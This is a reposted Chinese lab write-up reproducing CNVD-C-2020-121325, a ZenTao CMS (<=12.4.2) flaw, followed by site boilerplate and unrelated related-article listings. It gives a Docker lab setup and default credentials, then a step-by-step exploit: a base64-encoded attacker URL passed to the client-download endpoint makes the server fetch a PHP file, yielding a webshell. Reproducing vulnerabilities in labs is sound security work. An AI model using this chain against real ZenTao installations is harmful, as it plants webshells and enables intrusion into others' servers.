【CNVD/CVE】CNVD-C-2020-121325

这篇具有很好参考价值的文章主要介绍了【CNVD/CVE】CNVD-C-2020-121325。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


一、漏洞概述

禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。

二、漏洞影响范围

禅道CMS<=12.4.2

三、环境搭建

docker-compose.yml

version: '3.2'

services:
  web:
    image: nudttan91/cnvd-c-2020-121325:normal
    ports:
      - 80:80

四、利用流程

1、登录

进入环境后如图所示:
【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全
用户名:admin
密码:123456
【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全
登录进来后正常重置密码
【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全

2、准备

(1)在服务器上准备相关的木马程序

shell.php

<?php echo "<?php phpinfo();?>";

打开apache或者nginx就可以,反正是从公网能够下载到shell.php这个的文件的方法都行

(2)对恶意文件地址进行base64编码

http://xxx.xxx.xxx.xxx/shell.php

【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全

aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=

3、利用poc远程下载文件

http://xxx.xxx.xxx.xxx/zentao/client-download-1-aHR0cDovL3h4eC54eHgueHh4Lnh4eC9zaGVsbC5waHA=-1.html

【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全

【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全

4、getshell

shell地址:http://xxx.xxx.xxx.xxx/zentao/data/client/1/shell.php
【CNVD/CVE】CNVD-C-2020-121325,CTF,CNVD/CVE,php,服务器,开发语言,cnvd,web安全文章来源地址https://www.toymoban.com/news/detail-672458.html

到了这里,关于【CNVD/CVE】CNVD-C-2020-121325的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 服务器——SSL/TLS协议信息泄露漏洞(CVE-2016-2183)修复办法

    前言 :近期某台Windows Server服务器的远程连接端口(3389)被扫出了 SSL/TLS协议信息泄露漏洞(CVE-2016-2183) ,尝试了网上很多复制来复制去的 \\\"解决方法\\\" ,直接导致堡垒机连不上服务器,每次连不上服务器又得去找服务器提供方,真的非常麻烦,在此不得不吐槽一下某些不负责任的复制粘

    2024年02月03日
    浏览(44)
  • 启动SOLIDWORKS2020显示无法获得下列许可SOLIDWORKS Standard 无法连接到服务器(-15,10,10061)的解决办法

    1:出现这个提示。 2:因为Solidworks Flexnet Server服务没有启动。 3: 解决方法检查机器的计算机名是否为英文,如果不是更改机器名为英文,重启机器就可以了我就是用这种方式解决的问题。 4:如果还是不行,找到SolidWorks_Flexnet_Server文件夹,运行server_install。 5:或者在服务

    2024年02月15日
    浏览(42)
  • 服务器漏洞修复之SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

    风险描述 远程主机支持在一个或多个密码套件中使用 64 位块的块密码。由于使用弱 64 位块密码,因而会受到一个称为 SWEET32 的漏洞影响。具有足够资源的中间人攻击者可利用此漏洞,通过“birthday”攻击检测会在固定密码与已知纯文本之间泄露 XOR 的冲突,进而泄露密码文本(例

    2024年02月16日
    浏览(26)
  • 通过禁用CBC模式解决SSH服务器CBC加密模式漏洞(CVE-2008-5161)

    可以先执行一下第四步,验证一下问题解决前后的区别 第一步,进入服务器找到 /etc/ssh/sshd_config文件 第二步,编辑该文件找到# Ciphers and keying 添加或者修改为(其实就是去掉CBC的算法) 保存退出 第三步,重启ssh服务 第四步,验证是否成功 如果最后面出现 congratulations to y

    2024年02月16日
    浏览(32)
  • PHP进阶-IIS服务器发布PHP网站

    IIS服务器,相信开发者都不会陌生,它的英文全称是Internet Information Services,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务,常用于Windows系统的Web项目部署,本篇以PHP项目为例,讲解如何使用IIS完成PHP项目的发布。 下载地址:PHP: Downloads下载最新版本 下载Thr

    2024年04月28日
    浏览(41)
  • 漏洞还原及验证环境构建-Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)-【CNVD-2008-5105】-【CVE-2008-4250】

    虚拟机软件:vmware workstation 14 系统:Windows XP 系统、Kali系统 环境配置:(1)受害机:Windows XP SP3镜像(2)攻击机:Kali系统 (1)虚拟机受害机系统和攻击机系统之间能够相互通信 攻击机:Kali-192.168.110.129 目标机:Windows XP-192.168.110.128 (2)打开Windows XP系统,确定445端口开启

    2024年02月15日
    浏览(36)
  • SMB服务远程代码执行漏洞(CVE-2020-0796)加固指南

    漏洞信息 序号 漏洞类型 风险等级 漏洞主机( 操作系统及版本) 1 SMB 服务远程代码执行漏洞(CVE-2020-0796) 高 Windows 漏洞加固实施 漏洞1:SMB服务远程代码执行漏洞(CVE-2020-0796) 漏洞详细 2020年3月11日,某国外安全公司发布了一个近期微软安全补丁包所涉及漏洞的综述,其中谈

    2024年02月07日
    浏览(24)
  • Windows Server 服务器漏洞:OpenSSL 信息泄露漏洞(CVE-2016-2183)和 OpenSSL弱加密算法

    网上找了很久,修复主要是Windows方法很少,Linux服务器能直接命令升级版本或者修复 系统版本:windows server 2008 、iis7.0 这个漏洞我目前了解到是直接使用系统自带版本,版本过低引起的弱加密信息泄露,直接更新。 更新会同时把标题两个漏洞都补上 先下载一波安装包: ht

    2023年04月08日
    浏览(40)
  • php连接到 Web 服务器方式和php版本选择

    1、如何将 PHP 连接到 Web 服务器? web 服务器可以通过三种方法来利用 PHP 生成 web 页面。 第一种方法是将 PHP 自以为 CGI“包装器”用作一个单独运行的语言解释器(CGI Wapper)。当以这种方法运行时,PHP 会为向 web 服务器的每个 PHP 页面请求创建 PHP 解释器的实例,并在每个请求的

    2024年02月11日
    浏览(34)
  • PHP+Apache服务器+帝国CMS

    win10 环境搭建 1.简易安装参考菜鸟教程,链接:https://www.runoob.com/php/php-install.html/ 2.详细安装 Apache 服务器安装:Apache 是C语言实现的,专门用来提供HTTP服务;特性:简单、速度快、性能稳定、可配置(代理) 2.1.1、主要用于解析静态文本,并发性能高,侧重于HTTP服务; 2.1

    2024年02月14日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包